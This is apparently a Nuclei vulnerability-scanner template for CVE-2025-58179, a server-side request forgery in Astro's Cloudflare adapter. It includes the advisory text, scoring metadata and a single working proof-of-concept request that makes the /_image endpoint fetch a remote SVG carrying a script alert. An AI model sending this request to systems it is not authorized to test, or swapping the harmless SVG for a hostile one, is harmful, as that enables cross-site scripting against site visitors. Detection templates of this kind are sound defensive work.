Astro is a web framework for content-driven websites. Versions 11.0.3 through 12.6.5 are vulnerable to SSRF when using Astro's Cloudflare adapter. When configured with output: 'server' while using the default imageService: 'compile', the generated image optimization endpoint doesn't check the URLs it receives, allowing content from unauthorized third-party domains to be served. a A bug in impacted versions of the @astrojs/cloudflare adapter for deployment on Cloudflare’s infrastructure, allows an attacker to bypass the third-party domain restrictions and serve any content from the vulnerable origin.
PoC代码[已公开]
id: CVE-2025-58179
info:
name: Astro Cloudflare Adapter - Server Side Request Forgery
author: HoangAnhThai
severity: high
description: |
Astro is a web framework for content-driven websites. Versions 11.0.3 through 12.6.5 are vulnerable to SSRF when using Astro's Cloudflare adapter. When configured with output: 'server' while using the default imageService: 'compile', the generated image optimization endpoint doesn't check the URLs it receives, allowing content from unauthorized third-party domains to be served. a A bug in impacted versions of the @astrojs/cloudflare adapter for deployment on Cloudflare’s infrastructure, allows an attacker to bypass the third-party domain restrictions and serve any content from the vulnerable origin.
reference:
- https://github.com/withastro/astro/commit/9ecf359
- https://github.com/advisories/GHSA-qpr4-c339-7vq8
- https://nvd.nist.gov/vuln/detail/CVE-2025-58179
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2025-58179
epss-score: 0.01748
epss-percentile: 0.82036
cwe-id: CWE-918
cpe: cpe:2.3:a:withastro:astro:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: withastro
product: astro
tags: cve,cve2025,ssrf,xss,astro,cloudflare,vuln
http:
- method: GET
path:
- "{{BaseURL}}/_image?href=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg&f=svg"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script type="text/javascript'
- 'alert(document.domain);'
condition: and
- type: word
part: content_type
words:
- "image/svg+xml"
- type: status
status:
- 200
# digest: 4a0a00473045022069543ac4c4cff1e4ca93331dc92d4fffb07852635516c46c5a68b4a9bf31f108022100ef2028d51170a7409f9b65ee00dcad5cf5e5180f822bb2013223d9d99baf1ca0:922c64590222798bb761d5b6d8e72950